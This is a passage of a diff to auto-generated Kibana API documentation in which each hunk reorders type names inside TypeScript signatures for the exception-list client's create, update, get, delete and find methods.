created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -659,7 +659,7 @@ "signature": [ "({ comments, description, entries, itemId, meta, name, osTypes, tags, type, }: ", "CreateEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; 
updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -695,7 +695,7 @@ "signature": [ "({ _version, comments, description, entries, id, itemId, meta, name, osTypes, tags, type, }: ", "UpdateEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: 
string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -731,7 +731,7 @@ "signature": [ "({ itemId, id, }: ", "GetEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; 
created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -881,7 +881,7 @@ "section": "def-server.CreateExceptionListItemOptions", "text": "CreateExceptionListItemOptions" }, - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; 
})[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -929,7 +929,7 @@ "section": "def-server.UpdateExceptionListItemOptions", "text": "UpdateExceptionListItemOptions" }, - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | 
undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -971,7 +971,7 @@ "signature": [ "({ id, itemId, namespaceType, }: ", "DeleteExceptionListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; 
created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -1041,7 +1041,7 @@ "signature": [ "({ id, itemId, }: ", "DeleteEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: 
string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -1075,7 +1075,7 @@ "signature": [ "({ listId, filter, perPage, pit, page, searchAfter, sortField, sortOrder, namespaceType, }: ", "FindExceptionListItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | 
undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -1111,7 +1111,7 @@ "signature": [ "({ listId, filter, perPage, pit, page, searchAfter, sortField, sortOrder, namespaceType, }: ", "FindExceptionListsItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | 
undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
